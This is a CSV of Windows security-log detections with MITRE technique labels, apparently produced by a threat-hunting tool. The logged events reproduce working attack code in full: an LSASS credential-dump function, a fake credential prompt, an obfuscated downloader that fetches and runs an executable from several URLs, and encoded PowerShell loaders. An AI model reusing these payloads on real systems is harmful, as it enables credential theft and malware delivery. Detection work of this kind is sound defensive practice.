message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104," 4104 1 3 2 15 0x0 971 Microsoft-Windows-PowerShell/Operational MSEDGEWIN10 1 1 function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = "$($ProcessName).dmp" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { "Memdump complete!" } } 27f08bda-c330-419f-b83b-eb5c0f699930 C:\Users\Public\lsass_wer_ps.ps1 ",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104," 4104 1 3 2 15 0x0 1123 Microsoft-Windows-PowerShell/Operational MSEDGEWIN10 1 1 function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","") $username = "$env:username" $domain = "$env:userdomain" $full = "$domain" + "\" + "$username" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials("$full","$password") -ne $True){ $cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","") $username = "$env:username" $domain = "$env:userdomain" $full = "$domain" + "\" + "$username" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials("$full", "$password") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt c7ca7056-b317-4fff-b796-05d8ef896dcd ",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104," 4104 1 5 2 15 0x0 683 Microsoft-Windows-PowerShell/Operational DESKTOP-RIPCLIP 1 1 $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0') fdd51159-9602-40cb-839d-c31039ebbc3a ",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104," 4104 1 3 2 15 0x0 1122 Microsoft-Windows-PowerShell/Operational MSEDGEWIN10 1 1 &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) 37f6d110-cfdf-4118-8748-17638e258531 ",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 2164892 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2020-10-05 20:43:58.450 00247C92-858E-5F7B-0000-0010E741202B 6636 C:\Windows\System32\cmd.exe 10.0.18362.449 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe C:\windows\ LAPTOP-JU4M3I0E\bouss 00247C92-8C36-5F75-0000-002034E39103 0x391e334 2 High SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 00247C92-858E-5F7B-0000-00105241202B 18404 C:\Windows\System32\Taskmgr.exe C:\windows\system32\taskmgr.exe ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.36.133 ) and port ( 443 )",3," 3 5 4 3 0 0x8000000000000000 10272 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-02 14:48:51.664 365ABB72-0244-5CCB-0000-00109AE70B00 1508 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe IEWIN7\IEUser tcp true false 10.0.2.15 IEWIN7.home 49178 false 151.101.36.133 443 https ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 339891 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-02 16:24:28.637 747F3D96-E8BC-5F26-0000-0010F7C41A00 588 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-E308-5F26-0000-0020E7030000 0x3e7 0 System SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-E8BA-5F26-0000-001035BE1A00 8104 C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," 1 5 4 1 0 0x8000000000000000 564605 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-04-22 22:09:35.263 747F3D96-F41F-6081-0000-001078834A00 6644 C:\Windows\System32\svchost.exe 10.0.17763.1 (WinBuild.160101.0800) Host Process for Windows Services Microsoft® Windows® Operating System Microsoft Corporation svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost C:\Windows\system32\ NT AUTHORITY\LOCAL SERVICE 747F3D96-6E1A-6082-0000-0020E5030000 0x3e5 0 System SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 00000000-0000-0000-0000-000000000000 624 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 339890 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-02 16:24:26.803 747F3D96-E8BA-5F26-0000-001035BE1A00 8104 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "c:\windows\system32\cmd.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-E308-5F26-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-E309-5F26-0000-0010137B0000 820 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," 7 3 4 7 0 0x8000000000000000 29 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 17:01:35.680 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\vaultcli.dll 6.1.7600.16385 (win7_rtm.090713-1255) Credential Vault Client Library Microsoft® Windows® Operating System Microsoft Corporation SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," 7 3 4 7 0 0x8000000000000000 29 Microsoft-Windows-Sysmon/Operational IEWIN7 technique_id=T1003,technique_name=Credential Dumping 2019-04-18 17:01:35.680 365ABB72-AC28-5CB8-0000-0010F3F70700 1200 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\vaultcli.dll 6.1.7600.16385 (win7_rtm.090713-1255) Credential Vault Client Library Microsoft® Windows® Operating System Microsoft Corporation SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 true Microsoft Windows Valid ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password ),1," 1 5 4 1 0 0x8000000000000000 5898 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.691 365ABB72-3D6D-5CEB-0000-00104474FF00 2448 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," 8 2 4 8 0 0x8000000000000000 9066 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 12:43:43.784 365ABB72-4055-5CC8-0000-0010769D0B00 1532 \\VBOXSVR\HTools\voice_mail.msg.exe 365ABB72-3FE0-5CC8-0000-00107E590000 492 C:\Windows\System32\lsass.exe 3656 0x001A0000 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243552 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.397 747F3D96-9F69-5E75-0000-001033922000 6572 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243552 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.397 747F3D96-9F69-5E75-0000-001033922000 6572 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username ),1," 1 5 4 1 0 0x8000000000000000 5895 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:17.621 365ABB72-3D6D-5CEB-0000-00108270FF00 1340 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZ